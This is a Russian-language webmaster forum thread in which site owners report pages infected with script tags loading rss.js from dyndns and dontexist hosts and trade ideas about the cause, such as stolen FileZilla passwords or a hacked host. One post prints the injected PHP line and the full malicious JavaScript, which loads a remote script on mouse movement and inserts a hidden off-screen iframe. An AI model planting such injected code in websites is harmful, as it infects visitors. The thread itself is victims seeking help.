Вероятно вирус на сайте.

12 3
S
На сайте с 12.05.2010
Offline
71
3178

На некоторых своих сайтах только что заметил код внизу страницы после закрытия всех тегов (при открытии исходного кода страницы):

<script src="http://statistic.dyndns.org/rss.js"></script>

или

<script src="http://stat.dontexist.com/rss.js"></script>

Понять не могу что это. При открытии http://stat.dontexist.com/rss.js показывает пустой файл. Поиск в php кодах сайта по запросу statistic.dyndns.org ничего не дал. Странно.

Jaf4
На сайте с 03.08.2009
Offline
804
#1
starclyde:
При открытии http://stat.dontexist.com/rss.js показывает пустой файл.

Какая операционка и стоит ли антивирус? Посмотри без антивируса под линухом, через SSH или в винде, но в "песочнице", все увидишь..

New! NVMe VPS от SmartApe.ru (https://goo.gl/eoYYkS)
S
На сайте с 28.10.2005
Offline
296
#2
starclyde:
Поиск в php кодах сайта по запросу statistic.dyndns.org ничего не дал. Странно.

Как правило в зашифрованном виде это дело прописывается

S
На сайте с 12.05.2010
Offline
71
#3

Исправил. Вчера взломали похоже.

Jaf4:
Какая операционка и стоит ли антивирус? Посмотри без антивируса под линухом, через SSH или в винде, но в "песочнице", все увидишь..

Операционка винда + нод32. Как под линуксом то посмотреть его... результат такой же как в винде. FireBug тож результатов не дает. Че за бредовый взлом.

NasMnogo-Mbl-Sila
На сайте с 16.11.2010
Offline
41
#4

можно в базе поискать, у меня так было. Хитрожопые дописывали скрипты к конец каждой новости. Никак найти не мог)

Тут выкупают женский трафик по лучшей цене! (http://ladycash.ru/?ref=3828 ) ERA Host – хостинг 5 Гб за 3$, бесплатная раскрутка (http://erahost.ru/?ref=17726)
S
На сайте с 12.05.2010
Offline
71
#5

Возникла мысль.... а не смс баннеры ли таким образом распространяют.

1. Заразили кучу сайтов js файлами

2. пока ниче в нем не прописывают

3. настает время XXX, прописывают туда вредоносный код для загрузки файла с вирусом и вуаля ваши сайты становятся разносчиком заразы :)

T
На сайте с 13.01.2012
Offline
13
#6

Он в конце файла index.php

R
На сайте с 25.04.2012
Offline
0
#7

Столкнулся с такой же ситуацией.

echo '<script src="http://statistic.dyndns.org/rss.js"></script>';

?>

от 134.255.241.125

Вот код

var astatf = 0; document.write("<b><div id='pftgfkzif'></div></b>"); document.onmousemove=jsstatic; function jsstatic() { if (astatf == 0) { astatf++; var url = "http://ohvcdh.dontexist.org/styles.js"; var script = document.createElement('script'); script.setAttribute('src', url);document.getElementsByTagName('head')[0].appendChild(script);}}
text = "<iframe src='http://ohvcdh.dontexist.org/route.htm' width='6' height='10 ' style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe> ";
document.getElementById("pftgfkzif").innerHTML = text ;

Занятно, банит, если обращений несколько и при последующих файлы пустые.

Дописался во все индексы сайтов, которые у меня были в закладках файлзиллы, в одном случае похерил весь код. Хостингов (компаний) там было 2, так что похоже от меня (хотя не все сайты я даже открывал)

Кто то вылавливал причину?

T2
На сайте с 11.03.2011
Offline
69
#8

5 сайтов на сервере все заражены, этой херней, кто как лечил ? Не могу найти концы, все файлы прочисал, результат 0. Хелп плиз.

Сори тупанул искал в шаблоне , казалось индексный файл в корне лежал.

ПС. Есть мысль что на компе был трой который украл пасы из FileZilla у кого нить еще стоит FileZilla ? Тк у меня не один серв оказался заражен.

Jaf4
На сайте с 03.08.2009
Offline
804
#9
t707722:
5 сайтов на сервере все заражены, этой херней.

Тут от "херни" вряд-ли помогут. Пиши, что говорит антивирус для начала, что делал, чтобы вылечить. Пробовал из бэкапа залить измененные файлы?

C
На сайте с 10.11.2011
Offline
4
Con
#10

Обнаружил кто, как произошло заражение? Просто у меня несколько сайтов были заражены, все они на 1 хостинге (разные аккаунты). Один сайт без CMS и ломать там нечего (даже БД нету).... Я грешу на моего хостера, т.к. однажды его уже ломали и также было массовое заражение.

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий